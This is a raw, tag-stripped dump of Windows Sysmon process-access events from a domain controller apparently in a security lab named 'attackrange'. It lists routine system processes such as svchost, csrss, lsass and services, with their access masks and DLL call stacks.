10:39:54.261{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000966Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.261{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000965Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.261{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000964Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.261{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000963Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.261{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000962Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.261{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000961Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.261{733EE690-3DF7-5F80-0A00-000000007F01}852940C:\Windows\system32\services.exe{733EE690-3DFA-5F80-2000-000000007F01}2376C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000960Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.245{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3DFA-5F80-2000-000000007F01}2376C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000959Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.245{733EE690-3DF7-5F80-0A00-000000007F01}8521148C:\Windows\system32\services.exe{733EE690-3DFA-5F80-2000-000000007F01}2376C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000958Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.245{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000957Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.245{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000956Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.245{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000955Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.167{733EE690-3DF9-5F80-1200-000000007F01}12081008C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-0E00-000000007F01}1088C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6a54|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000954Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.167{733EE690-3DF9-5F80-1200-000000007F01}12081008C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-0E00-000000007F01}1088C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6a54|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000953Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.151{733EE690-3DF9-5F80-1000-000000007F01}11322192C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+581c4|C:\Windows\System32\RPCRT4.dll+39bd0|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000952Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.151{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3DFA-5F80-1F00-000000007F01}2288C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000951Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.136{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3DFA-5F80-1E00-000000007F01}2280C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000950Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.136{733EE690-3DF9-5F80-1000-000000007F01}11322084C:\Windows\system32\svchost.exe{733EE690-3DFA-5F80-1E00-000000007F01}2280C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+64ed5|C:\Windows\SYSTEM32\ntdll.dll+64bdd|C:\Windows\SYSTEM32\ntdll.dll+64a40|C:\Windows\SYSTEM32\ntdll.dll+45b70|C:\Windows\SYSTEM32\ntdll.dll+2a073|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000949Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.136{733EE690-3DF9-5F80-1200-000000007F01}12081008C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-0E00-000000007F01}1088C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6a54|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000948Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.136{733EE690-3DF9-5F80-1200-000000007F01}12081008C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-0E00-000000007F01}1088C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6a54|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000947Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.136{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000946Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.136{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000945Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.136{733EE690-3DF9-5F80-1200-000000007F01}12081008C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-0E00-000000007F01}1088C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6a54|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000944Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.057{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000943Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.057{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000942Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.042{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exeC:\Windows\System32\wbem\Repository\WRITABLE.TST2020-10-09 10:39:54.042 10341000x8000000000000000941Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.964{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2196C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000940Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.964{733EE690-3DF9-5F80-1000-000000007F01}11321700C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2196C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+64ed5|C:\Windows\SYSTEM32\ntdll.dll+64bdd|C:\Windows\SYSTEM32\ntdll.dll+64a40|C:\Windows\SYSTEM32\ntdll.dll+45b70|C:\Windows\SYSTEM32\ntdll.dll+2a073|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000939Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.964{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2184C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000938Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.964{733EE690-3DF9-5F80-1200-000000007F01}12082044C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|c:\windows\system32\es.dll+118e5|c:\windows\system32\es.dll+13b72|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be 10341000x8000000000000000937Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 